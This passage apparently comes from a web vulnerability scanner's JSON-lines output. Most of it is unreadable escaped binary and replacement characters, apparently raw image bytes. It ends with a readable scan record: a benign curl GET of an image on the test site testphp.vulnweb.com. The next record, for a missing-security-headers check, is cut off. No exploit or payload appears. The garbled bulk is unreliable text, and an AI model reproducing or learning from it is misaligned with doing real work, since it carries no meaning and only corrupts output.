ufffd\\u001f\\ufffd\\ufffdT\\ufffd\\ufffdĩUn \\ufffd\\ufffdy!\\ufffd7\\ufffdXث\\ufffd\\ufffd\\n\\ufffdpA\\u0007\\ufffd~C\\u001b\\ufffd*\\ufffd\\u0012\\ufffd\\ufffd\\ufffd*\\ufffd\\ufffd\\ufffdO`)\\ufffd\\u0014\\ufffd[n?\\u000bm\\ufffd\\ufffd\\ufffd_\\ufffd\\ufffdFv\\ufffd\\ufffd\\ufffd@Hls\\ufffd\\ufffd\\ufffdX\\ufffd\\ufffd\\ufffd:\\ufffdu\\u000f\\ufffd\\ufffdݣ\\ufffde.\\ufffd\\ufffd\\\"\\ufffdG\\ufffd#\\u003c7\\ufffd\\ufffd#\\u0004\\ufffd0Mh\\ufffd)\\ufffdq.\\t\\u001dR^\\t\\ufffd\\u0015\\ufffd\\u0017\\ufffd]iڽ\\ufffd\\ufffd-\\ufffd\\u0013,',\\ufffd\\ufffd\\ufffd\\u0018\\ufffd\\ufffd\\u003c\\ufffd;\\ufffd\\ufffdgu\\u001e\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffdP\\t\\ufffde\\ufffd7*\\ufffd\\ufffd'\\ufffd\\u0000\\ufffd\\ufffd\\ufffdM\\ufffd\\ufffd\\u000cVR\\ufffdLH\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000c\\u001c\\ufffdˑ\\ufffd\\u0007\\u0015\\ufffdi]=\\u0012\\ufffd+.X\\u00101\\ufffd\\ufffd\\ufffd9\\u0003۵f\\ufffd\\ufffdI\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\ufffd\\ufffdMa\\u001cg\\ufffd\\ufffdM\\ufffd^\\ufffdkp1$M\\ufffd\\ufffd\\u0010\\u000f\\ufffd\\u0019\\u0000\\ufffd\\ufffd\\u0011\\ufffd\\\"\\ufffdWV\\ufffd/OEu%\\ufffd\\u0017\\u0010\\ufffd,\\ufffdݸ\\u003ep0\\ufffdl\\ufffd\\ufffd\\u0003 \\ufffd\\\\v\\ufffd\\ufffd=K\\ufffdE\\ufffdot\\ufffd\\ufffd\\ufffd[iZ3\\ufffd\\n\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\u001f\\ufffd\\ufffdE\\ufffd\\ufffd\\ufffd;rS\\ufffd\\ufffd[-ԥ*\\ufffd\\u0008\\ufffd)@\\nR\\ufffd\\u0000\\ufffd)@\\nR\\ufffdDŽ\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd\\ufffd\\u0012\\ufffd\\ufffd६\\ufffdC ~1\\ufffd\\u001c烐p1ۜT:\\ufffdEzx;,xHt \\ufffd\\ufffd\\ufffd/\\ufffd\\ufffd[T\\ufffd\\ufffdOan\\ufffd\\ufffd\\u0014\\ufffd6]FH \\ufffd\\ufffd~\\u000e\\ufffd\\ufffd\\ufffd\\ufffdJi\\ufffd\\ufffd\\u0014\\ufffd\\ufffdj;\\ufffd\\ufffd\\ufffdOW\\ufffd\\u001f\\ufffd\\u001f53\\ufffd\\ufffd4\\ufffd\\ufffdn$\\ufffd\\ufffd9\\u0012eo0\\ufffd`\\ufffdb\\ufffd9\\u0001\\ufffd#,\\ufffd\\ufffd\\u0004\\ufffd\\ufffdY\\ufffd\\ufffd\\ufffd\\ufffd.\\u0012g\\ufffd[{\\ufffd\\\\1\\u000c\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdazj\\ufffd\\ufffd\\ufffd\\ufffd-\\u003e\\ufffd\\ufffd\\ufffdMa\\ufffd\\ufffd\\u0011\\ufffdꚽ\\ufffd\\ufffd\\u0018f\\ufffdG\\ufffdq\\u0012\\u0026\\ufffd\\u00263\\ufffd\\ufffdQ\\ufffd0T\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdE\\ufffd[^\\ufffdIs\\ufffdtp\\ufffd[1\\u000c{\\ufffd\\r\\ufffd\\ufffd~\\u0004\\ufffd\\u0000z\\ufffd5\\ufffdG\\u0012eG\\ufffd:\\ufffd@8'\\ufffd\\u001e@\\ufffd \\u0001\\ufffd\\ufffd\\u0000H\\ufffd\\\\6\\ufffd\\ufffd\\ufffd\\ufffd8\\ufffd\\ufffd \\ufffd\\u001c\\ufffdƌz\\ufffd\\ufffd;\\ufffd\\ufffd1\\ufffdy\\ufffd\\ufffd\\u0013\\\\\\ufffd=\\ufffd\\ufffd\\ufffd\\n*\\\\~ÝUJO(\\ufffdZD!\\u0002$\\ufffd\\ufffde\\ufffd\\u000eCn\\u001fF\\u001c\\u001fʯ\\ufffdt\\ufffdw\\ufffdK\\u001cc\\u0002u-\\u001b\\ufffd68\\ufffd\\u0019?\\\\sߜ\\ufffdqY\\ufffd\\ufffd\\ufffd$\\ufffd\\ufffd\\ufffd뱉b\\n\\ufffd\\ufffd\\ufffd\\u003e~\\ufffdZ\\ufffd\\ufffd8S\\ufffdQ\\ufffd\\ufffd\\ufffds\\ufffdU;z\\ufffd\\ufffd\\ufffd\\ufffd̙(\\ufffd\\ufffd[\\ufffdX]DV\\u001b\\ufffdW}\\ufffd\\u0002\\\\\\u0000\\t\\u001c\\u001e\\ufffd\\ufffd\\ufffd\\u0008\\ufffdY\\ufffd\\ufffdh\\ufffdF\\ufffd\\ufffd\\n4\\ufffd\\ufffda\\ufffd\\ufffd8\\ufffdl\\ufffd\\u001e;\\ufffd\\u0013\\ufffd*\\ufffd5\\ufffd\\ufffd^-\\ufffd\\ufffd3\\ufffd\\u0001 pO\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdk\\u0003\\u0018\\ufffdn#B\\u0019J\\ufffd\\u003c\\ufffd\\u001e\\ufffd\\ufffd]F\\ufffd\\ufffd/\\ufffd'zQ\\ufffd\\ufffdd\\ufffd0\\\\}\\ufffdy\\u001b|ou4H\\u0013\\ufffd\\ufffdY\\ufffdg#\\ufffd\\ufffd3\\\\\\ufffd\\ufffd$\\ufffd\\u0017\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdA\\\"G\\ufffdZ\\ufffd\\ufffd1\\ufffdy\\ufffd\\u00267\\ufffd\\ufffd\\ufffd3\\ufffd\\u0000\\ufffd}\\ufffd\\ufffd.\\ufffd\\ufffd\\ufffdNH\\ufffd\\ufffd0\\ufffd\\r\\ufffdg\\t\\ufffdL\\u0012\\u0000\\ufffd\\ufffd\\ufffdX\\u000f\\ufffd\\u001e\\u001f\\ufffd\\ufffd\\ufffdؠ\\ufffd\\ufffd\\u001e\\ufffd\\u000c\\ufffdu\\ufffd\\ufffdp\\ufffd\\ufffd\\u000c\\ufffd\\ufffd\\u0014\\ufffd\\\\\\ufffd\\ufffd\\u0007\\u0007\\u0018=N\\ufffd\\ufffd#\\ufffd\\ufffdE\\ufffd\\ufffd/)\\ufffd\\ufffd\\ufffd7\\ufffd{\\u000c.N \\ufffdJԬ\\ufffd\\ufffdo\\ufffd,\\ufffd#1\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd*-zj\\ufffdtr\\ufffd*\\ufffdA\\\"\\ufffd\\ufffd\\ufffda\\u0013\\ufffd\\\"\\ufffd\\u000e\\u000b\\u0000\\t\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd@\\nR\\ufffd\\u0000\\ufffd)@\\nݽ\\u0019\\ufffd\\u000e\\ufffd\\ufffdtJi7\\ufffd;\\u000f\\ufffd\\u0008\\u001d\\u0004W6Q\\ufffd^bn\\u001b\\ufffd\\ufffdr\\ufffd\\u0000\\u0001݇\\u000cG\\ufffdq\\ufffd\\ufffd*U}N\\ufffd\\ufffdTT-YI\\ufffdt\\u0026\\ufffd\\ufffd\\u0013\\ufffdn\\ufffd\\ufffd\\ufffd7\\ufffdtKy\\ufffdn-\\ufffd%x\\u0004\\ufffd\\u0008Ϩ\\u000c.C\\u0002\\u0000ʳ\\u0005$pH8\\ufffd\\u0008[\\ufffd\\ufffd\\\"]\\ufffd-\\ufffd\\ufffd\\ufffd,\\ufffdr-\\\\\\u0004i\\ufffd\\ufffd#.Oel\\u0010\\u001b\\ufffd;O#\\u0019\\ufffdO\\n\\ufffd@\\ufffd\\ufffd}n9\\ufffd.\\ufffd\\u000f i\\ufffd\\u0007\\ufffd\\ufffdo\\ufffd\\u0003\\ufffd\\nϺ\\ufffd\\ufffd[\\ufffdg\\ufffd4\\ufffdm\\u003c\\ufffd:\\ufffd\\ufffdY\\ufffd\\ufffd+mf\\ufffd\\ufffd\\ufffdn\\ufffd\\u0015\\ufffdM\\ufffd\\ufffdFw\\ufffd\\ufffd\\u0007z\\ufffd_\\ufffdŰԿq\\ufffd1\\ufffd\\ufffd\\u001f,y-\\ufffd\\ufffd\\ufffd[\\ufffd\\ufffd}2\\ufffd\\u0005 x\\ufffdQ\\u003cBkq'\\u000f\\ufffd\\u0003r\\ufffd\\ufffd\\ufffdI\\u0003\\u001f\\u0004|\\u001a\\ufffd%\\ufffdb΀\\ufffd\\u0007'\\ufffd\\ufffd.\\ufffd\\ufffdg\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdݕ\\ufffd\\ufffd\\ufffd\\ufffd\\u0015i!\\ufffd+\\ufffd1\\ufffd\\u0001\\u000e\\ufffd%\\ufffd\\u0018\\ufffd\\ufffd\\ufffd\\ufffdF+=\\ufffdb\\ufffd\\ufffd1ナ\\ufffdYMt݋\\ufffd\\ufffdș\\ufffd\\u0019Dt\\ufffd\\ufffd\\u0014\\\\\\ufffd\\u000e_fcRC}x\\ufffd\\u000fDZ\\ufffd\\u003e\\ufffd\\rݵմ\\ufffdkr\\ufffd\\u0016\\ufffd\\ufffd\\u0000ψ\\ufffd\\ufffd^0Ɂ\\ufffd\\\\\\u0013\\ufffd\\u00169\\u003c\\ufffd\\u0001W8\\ufffdY\\ufffdz\\u0015\\u003c\\ufffd;Np\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdU\\u0003\\ufffd\\u0004\\u000eǸ\\ufffd\\ufffdДc?W\\u0001\\ufffd\\ufffd\\\"\\ufffd\\\\%\\ufffd@\\ufffd\\ufffd'\\u0001\\ufffd\\ufffdʺ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd=\\ufffd\\u0000\\u001a\\ufffdP\\ufffd\\ufffd7\\ufffd\\ufffd\\u001f\\ufffd \\ufffdK;\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\u0006\\t\\\\z\\ufffd\\u0017\\ufffd\\u0005\\ufffd\\ufffd0\\ufffd\\ufffdrx\\u0018\\u0019\\ufffdn)\\ufffdM\\ufffd\\ufffd_\\ufffdG\\\"5\\ufffdI%\\ufffd\\ufffd\\t\\u0002V\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdqT\\ufffd\\ufffd/,\\u000e\\ufffd\\u0019]C\\ufffd\\u0003\\ufffd\\ufffd\\n\\ufffd\\ufffd\\u0003R\\ufffd\\ufffd\\ufffda\\u0001\\u0016\\ufffd\\u0014h\\ufffdE\\ufffd\\ufffd1\\u0004\\ufffdp\\u000f\\u001f8\\ufffd\\ufffdQU\\\\\\ufffd\\ufffd\\u0016^E\\ufffd74w\\ufffd\\ufffd\\u0010\\ufffdp\\ufffdsG\\ufffdb\\ufffd\\u0015\\u0001fE?˺\\u0000\\u0000\\ufffd\\ufffd\\ufffdl\\u0000\\u0003\\u001e;\\u0006\\ufffd\\ufffd.\\u0003ᯄ6\\ufffd\\u00163[u\\ufffd\\ufffdMQ\\ufffd%b\\ufffd\\ufffdhT*\\ufffd0R;\\ufffd'\\ufffd\\ufffd\\\\`溺\\ufffd\\u0000$\\ufffd\\ufffd\\u003c\\ufffd(0\\ufffd\\u0018\\ufffd\\u0000|`\\ufffd\\ufffdU\\ufffdP\\ufffd\\ufffd]ķ\\ufffd!\\ufffdB\\ufffd\\u003e0T\\ufffda\\t\\ufffd\\ufffd\\u0019\\u001e\\ufffd\\u0000\\u0011\\ufffdgAG]\\ufffdQ\\ufffd\\ufffdf\\ufffd\\ufffd\\ufffd\\u0000RǏ\\ufffd\\ufffd\\\"\\ufffd\\u001c\\ufffd\\ufffd5~\\ufffd\\ufffdt\\ufffd\\ufffdM\\ufffd6\\ufffd\\ufffd$p\\ufffd\\ufffdI\\ufffd\\ufffd+\\ufffdm\\ufffd\\u000c\\u0002{\\ufffdx\\ufffd\\ufffd9\\u000bZ\\ufffd.\\ufffdmR\\ufffdO\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffd\\ufffd\\u003c\\u0010\\u000e\\u0008\\ufffd}\\rz;\\u000cP\\ufffd\\u001cN\\ufffddP7F㜃\\ufffd\\ufffdpG\\ufffd\\ufffd\\\\\\ufffd\\ufffd'|5\\ufffdL\\u000f\\ufffdZ4\\u0011\\ufffd\\ufffd)k\\ufffd\\ufffd\\ufffd\\ufffdI\\ufffd#.J\\ufffdz\\u0007$\\ufffd=9\\ufffd8\\u0002\\ufffd~\\ufffdu\\ufffd\\ufffdt^\\ufffd\\ufffd\\u001f_\\ufffd3Q\\u00055\\ufffd\\ufffd\\ufffd\\\\\\ufffd)[€\\ufffd)@\\nR\\ufffd\\u0000\\ufffd)@\\u001d5\\ufffd7\\ufffdK'H\\ufffd\\u001a\\ufffd\\ufffd\\ufffd}.O9\\u001eFr\\u0004\\u001d\\ufffd*\\ufffd\\u000b(\\ufffd\\r\\ufffd\\ufffdv\\u001c1\\u003co\\ufffd\\ufffdEK[\\ufffd\\ufffd\\ufffd\\ufffd1R$i\\u000b\\u0015\\ufffdc@\\ufffd\\ufffd\\ufffd\\ufffd\\r\\ufffd\\ufffd\\ufffd\\u001c\\ufffd\\n\\ufffd\\ufffd@\\ufffdnt]R\\u001b\\ufffd6ı\\ufffd\\ufffḑ\\ufffdS\\ufffd\\ufffdEu\\ufffd\\ufffd\\ufffd\\ufffd%\\ufffd\\ufffdq̗\\ufffd\\ufffdл\\u001c\\u0003\\ufffd$\\ufffd\\u0019\\ufffd\\ufffd)\\ufffd\\ufffd\\u000c\\ufffd\\rb\\ufffd\\ufffd\\ufffd**WU\\ufffd\\ufffd\\ufffdOgz\\ufffdf\\ufffdԄ\\ufffd\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd-\\u003c *\\ufffd\\ufffd\\u0000d1\\ufffd\\ufffd\\u0014c\\u003c\\u001f\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffdIm$\\ufffd\\ufffd:\\u000f0\\u0014V_Ab\\u0007\\ufffd\\ufffd\\u0004\\u0015*W$\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\ufffd\\ufffd;M\\u0006\\ufffdSYLRYrʌ]\\ufffd\\ufffd\\u0014\\u000e\\u0007\\ufffd\\ufffd\\u00198\\ufffd\\t\\ufffdlU\\ufffdÿ\\u0013\\ufffd\\ufffd\\ufffdd\\ufffd\\u0013ej\\ufffd\\ufffd\\ufffde\\ufffd\\ufffd\\ufffd\\u001f\\ufffd\\ufffd\\u0000\\u0018e*\\ufffd6{z\\u0018}\\ufffd\\u000e\\u001d\\u001d3U\\n%j_-\\ufffd\\ufffd\\u0000G\\ufffd4\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdbIc\\ufffdf\\u0001ܣ%\\u001aA\\ufffd'\\ufffdRN\\u0014\\n\\ufffdb\\u003eߤ\\ufffd\\ufffd\\ufffd\\u003eZ2\\ufffdg\\u0008\\ufffd\\ufffdr\\ufffd\\ufffdr\\n\\ufffd#\\ufffd\\ufffd\\ufffd-N\\ufffd\\ufffd\\ufffd\\t\\ufffdl\\ufffd2\\ufffdBF\\u000f\\ufffd\\u0011\\ufffdE}i\\ufffd\\ufffd'\\ufffd\\ufffdܬ2yh\\ufffd\\ufffdlM\\ufffd\\ufffd\\ufffd\\ufffd@?\\ufffd\\u000f\\u001d\\ufffd\\ufffd)O\\ufffd\\u0012\\ufffd\\\"4\\ufffd\\ufffd\\u0017\\u000b4A\\ufffdӆ(\\ufffdN@e$0\\u0007\\u0003 \\u0010Goj4\\ufffd\\u0000b\\ufffd\\ufffdW\\u0002\\t1\\ufffdg\\u003cq\\ufffd\\ufffd?\\u000b\\ufffd1\\ufffd\\ufffd\\ufffdN\\u0013\\ufffd\\ufffdX\\ufffd\\ufffd\\ufffd8\\u000e\\ufffd\\ufffd1\\u001a\\ufffd\\u0007\\ufffdrs\\ufffd\\ufffd\\u0000J\\ufffd4{\\ufffd{eNy\\ufffd\\ufffd\\u0000l\\ufffd\\ufffd\\ufffdN\\ufffd'\\r\\ufffd\\ufffdڟ%\\ufffd\\ufffd9?\\ufffd\\\\H\\ufffd\\ufffd樑d\\u000e\\ufffdy\\ufffdvc\\u0018\\ufffdl\\u001eC\\u000c\\ufffd\\ufffdc?\\ufffd\\ufffdu\\u0017\\ufffd:\\ufffd\\u0018\\u0015 \\ufffd\\ufffd\\ufffd9\\u0007\\ufffd\\ufffd\\ufffd\\ufffdE\\ufffd\\ufffdh\\ufffdf\\ufffd\\ufffdN\\ufffd? g\\ufffd##\\u003e٩v\\ufffd)q\\n\\ufffd\\u0013\\u0006\\u000c\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd9+\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd5\\ufffdأ%\\ufffd\\ufffd}\\ufffd\\u0018\\u0000x݁uw\\u003cr2\\ufffdy\\ufffd\\u0019\\ufffd܏bI0z\\ufffdN\\ufffdR\\ufffd\\ufffd\\ufffdh\\ufffd{gc\\ufffdG*\\ufffd\\ufffd\\ufffdF\\u0018!\\ufffd\\u000er;\\u000c\\ufffd\\ufffdo\\ufffd!\\ufffdX\\ufffd\\ufffd\\ufffdv\\ufffd\\u0000\\ufffd\\u0003\\u0003;\\ufffd d\\ufffd\\u0000H'\\u0007\\ufffd\\ufffdy\\u0014Yb\\ufffd\\ufffd\\ufffd\\ufffd/\\u001f\\ufffd\\ufffd\\ufffd\\u0016\\ufffd\\ufffd\\ufffd\\ufffdBj:O^\\ufffd\\ufffd\\ufffd\\ufffdks~\\ufffd\\ufffde\\ufffd\\ufffd\\u000b\\ufffd\\ufffd\\u000c7#\\ufffd\\u0001\\ufffdOr\\u0006\\u0001\\u000c=\\ufffd\\ufffdֽ\\u0019\\ufffd\\ufffdeݬ\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdȌ\\u001d\\u001cP\\u000c?\\ufffdO\\u0004w\\u0007\\ufffdA=ܶV\\ufffdk\\ufffd$\\ufffd \\ufffd\\ufffd\\ufffdCi+\\u0016$$\\ufffd\\u0017\\ufffd9\\u003e\\ufffd\\u0019\\u001c\\u000c2ջ\\ufffd.\\ufffd\\ufffd\\ufffdΓ\\ufffdѵ+cotS̷\\ufffd\\u001b\\\\E0\\ufffd\\n\\ufffd3\\ufffd0r\\u0001*\\ufffd\\ufffd\\ufffd6\\ufffdj\\ufffd\\ufffd\\\\m\\ufffd\\ufffd\\u001e\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^zd\\ufffd\\ufffd\\ufffd\\ufffdVs\\ufffdx[\\ufffd\\ufffde\\ufffd\\ufffduu\\ufffdI\\ufffdm8o\\ufffdt\\ufffd\\u0018\\ufffd\\ufffd\\ufffd\\t\\ufffd̀\\u001eX\\u000c.\\u0018\\u001c\\u0015l`ղ\\ufffd\\ufffd\\ufffdY\\ufffdI\\ufffd\\n\\ufffd.\\u003c\\ufffdR\\ufffd \\ufffd\\ufffd\\ufffd\\u0000+$鞮\\ufffdzz\\ufffdh\\ufffdXs\\ufffdE\\ufffd\\ufffdS\\u00122G\\u003e\\ufffdc\\ufffd\\ufffdt\\ufffd\\ufffd\\u0011\\ufffdĖP\\ufffd\\ufffd\\ufffd\\u0026˩\\ufffdM\\u0014\\ufffd\\ufffdw\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd,\\t\\ufffd\\u003e\\ufffd\\u0000P)\\ufffdj7:N\\ufffd\\r唅'\\ufffd\\ufffd\\u0003\\ufffd~\\ufffd\\ufffdj\\u0015)ZMa\\ufffd\\ufffd:\\ufffd\\ufffdz\\ufffd\\u0014\\ufffdi.\\r\\ufffd0\\ufffd\\ufffdb\\ufffd6\\ufffd.~\\ufffd\\u0012I\\ufffd\\ufffdϾs\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffdV\\r\\ufffd\\ufffd\\ufffd˒\\ufffd\\u0016%s\\ufffd\\u003c\\ufffd\\ufffd\\ufffd5\\ufffd\\ufffd\\ufffd\\ufffd\\\\\\ufffdG\\ufffd7NH\\ufffd\\ufffdw\\ufffd\\ufffd\\ufffd\\u003cՌ\\u003eF@,\\ufffdw\\u0003\\ufffds\\ufffd9\\\"\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd=jd\\u0026W\\ufffd\\ufffdԏ1\\ufffdm\\ufffd\\ufffdڟ@\\ufffd\\ufffdܱ\\ufffd\\ufffd\\u0005\\ufffd4\\ufffd\\ufffdl\\ufffdQ\\ufffdK)\\ufffd|c\\ufffd:TNV\\ufffd\\u0026f)\\u0000:\\ufffd\\ufffd\\u000c9\\ufffd\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000f|\\ufffd\\ufffdH\\ufffd\\ufffdKx\\ufffd9\\ufffdYa\\ufffd\\u000c\\ufffdT\\ufffd\\ufffd.J\\ufffd\\ufffd]\\ufffd%\\ufffdw\\ufffd|\\ufffd\\u00260\\ufffdw\\u0003\\ufffd\\u000foҲ\\ufffd\\u000eܢ\\ufffdc\\ufffda\\ufffd\\\\SP\\ufffd\\ufffd\\u0011$2\\ufffd\\ufffd7\\u001b\\ufffd\\ufffd|~+\\u001b\\ufffd\\ufffd[[\\ufffd\\ufffd\\ufffd\\ufffd0$\\ufffdô\\u0010s\\ufffd~y\\ufffdg\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd-/\\ufffd\\ufffd_4D\\ufffdޑ\\ufffd\\ufffd\\ufffd9\\ufffd\\ufffd@\\u001f#\\ufffd\\ufffdS5m@\\\\\\ufffd\\u001e\\ufffd0ϸ\\ufffd2\\ufffd\\ufffd($\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffdN\\u001a\\u0019S-\\ufffdc\\ufffd\\ufffd62\\ufffd5\\ufffdV\\ufffdt\\ufffd\\ufffd\\ufffdVR\\ufffd\\u0019\\ufffd~\\ufffdF\\u0008 \\ufffd`\\ufffdԻ=v\\ufffd\\ufffd\\ufffdV2\\u003c\\ufffd\\u0002\\ufffdbA\\ufffd\\ufffd\\u00001' \\ufffd\\u00003ܑ\\ufffdyƓ\\ufffd\\ufffdR\\ufffdU\\ufffd\\u001d\\ufffd\\ufffd\\u0018\\ufffdE\\ufffd\\ufffd9ܟ\\ufffd\\u0003۱\\ufffd\\ufffd\\ufffd\\ufffdT=T\\ufffdƭ\\ufffd\\ufffdRyU7\\ufffd*\\ufffd\\ufffd\\tu\\u0005\\ufffdG\\u0003qQ\\ufffd\\ufffd\\ufffdƬˢO\\ufffde\\ufffd\\ufffd\\u0010\\ufffd\\ufffd\\ufffdQ\\ufffd:\\ufffd\\ufffd5\\ufffds\\ufffdF\\ufffdl\\ufffd\\u0008#\\ufffd\\u000fЃ\\ufffd\\ufffd\\ufffd\\ufffdZMom\\ufffd\\ufffds2\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffd`\\u001229\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd#\\ufffd\\ufffd{v\\ufffd\\u001c\\ufffd\\ufffdV\\ufffd\\u0018u#\\ufffd\\ufffd@\\ufffd\\ufffd\\\\\\ufffd\\ufffd_X\\ufffd\\ufffdRА;\\\\+\\ufffdY\\ufffd}\\u0003\\ufffd\\ufffd\\u001c\\ufffd\\ufffd+\\ufffd\\ufffd*N\\ufffd\\ufffd\\ufffd)\\ufffd\\ufffd\\ufffd?an\\ufffdW\\u0013lx\\ufffd\\ufffd/\\ufffd\\ufffd\\u0017\\ufffd\\ufffd\\ufffdt\\ufffdwD4N\\ufffd\\ufffdI\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\u001d\\ufffd@? v\\ufffd\\ufffd\\ufffdr9\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdו\\ufffd\\ufffd\\ufffd7%\\ufffd9\\ufffd\\ufffd5N\\ufffd=?\\ufffdס\\ufffd\\ufffd~Ne\\ufffd\\ufffd\\u001eX\\ufffd)Wȅ)J\\u0000R\\ufffd\\ufffd\\u0005)J\\u0000\\ufffd\\ufffd^ɧjVװ\\ufffd2[Ȳ\\ufffde\\u000c\\t\\u00078 \\ufffd\\u0008\\ufffd\\u0011\\ufffd\\ufffd۾\\ufffd\\ufffdP\\ufffdM\\ufffdFb\\ufffdH\\ufffd\\ufffd\\u000b\\ufffd\\\\+/\\u0003\\ufffd\\u000e\\t\\ufffd\\u0013\\ufffd\\ufffd\\ufffdj\\ufffdtް\\ufffd,\\ufffd\\ufffdk\\u0015t{kv-\\u0018 \\ufffd\\\\\\ufffd\\u0006\\ufffd\\u0012H\\ufffd\\u0026\\ufffd\\ufffd\\ufffd\\u0004un2\\ufffd\\ufffd\\ufffdznu\\ufffd\\ufffd}#]\\u000f:\\ufffd\\ufffd=9a\\ufffd~ď\\ufffd\\u001a\\ufffd\\ufffdj\\ufffdV\\ufffd\\ufffd\\ufffdʪ\\u00103\\ufffd\\ufffd\\u0006I\\u001e\\ufffd\\ufffd{r\\u0007\\u0015\\ufffd4\\u001dXKio{lΚh\\ufffd\\ufffd)%\\u001e\\ufffd\\u0018\\ufffd\\ufffd\\u001d\\ufffd\\u001c\\u0015\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffd\\u001da\\u0016\\ufffdu\\u0004s\\ufffdC\\u0018\\u000b$C'w\\ufffd\\u0004\\ufffd\\ufffdn\\r\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0014]\\ufffd\\ufffdG,\\ufffdu7_ZOc\\u0006\\ufffd\\u0010H\\ufffdl\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd s\\ufffd\\ufffd\\u001fp\\u0006@'\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdK4\\u0010\\ufffd{\\u0015IJ@]\\ufffd\\u0016\\u0000m\\ny\\ufffd8\\u0018\\ufffd\\ufffd\\ufffd\\u001a\\ufffdɼ\\ufffd.n\\ufffd\\ufffd3J\\ufffd\\u0015\\ufffd\\ufffdI\\ufffd\\ufffdQ\\ufffd\\ufffd\\ufffd#\\ufffdԸ\\ufffdり\\ufffdY\\ufffdz\\ufffd\\u000b\\ufffd\\ufffd\\ufffd}F\\ufffd\\u0012\\u001a7\\ufffd\\ufffdubC\\ufffd\\ufffd\\ufffd\\ufffdx8\\ufffd\\ufffd8\\ufffdZ.\\ufffd\\ufffd\\ufffdv\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\u001fO\\ufffdI\\u000c\\ufffd\\ufffdF\\ufffd\\ufffd \\ufffd#\\ufffd\\u0013\\ufffdV\\ufffdU\\ufffd\\u0008\\ufffd\\ufffdcn\\u0008\\ufffd\\ufffd\\ufffdrX\\ufffd\\ufffde\\ufffd\\ufffd|\\ufffd=\\ufffd\\ufffdA\\ufffd(PB\\ufffd\\ufffdm\\\\\\u001eG\\n\\ufffd\\ufffd\\ufffd'\\u0000V\\ufffd\\ufffd\\rA\\ufffdMf\\ufffd\\ufffd\\ufffdw\\ufffd!*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffdQU\\ufffd\\ufffd\\ufffd\\ufffd\\u0016\\u0007J\\ufffdK\\ufffdJR\\ufffd\\u0018)JP\\u0002\\ufffd\\ufffd\\u0000)JP\\u0002\\ufffd\\ufffd\\u0000)JP\\u0006ᖳq\\ufffd\\ufffd]?%\\ufffd\\ry\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd \\ufffd\\u0008\\ufffd;f\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffd\\ufffdۉ\\ufffd\\n\\ufffdY\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffdX\\ufffdQ\\ufffdN\\u0000\\ufffd$\\ufffd\\ufffdiJ\\ufffd\\u0018\\ufffds\\ufffd\\ufffdHߤ\\ufffdҔ\\ufffd$b\\ufffd\\ufffd\\u0000)JP\\u0002\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:23.829706609Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0' 'http://testphp.vulnweb.com/pictures/6.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security 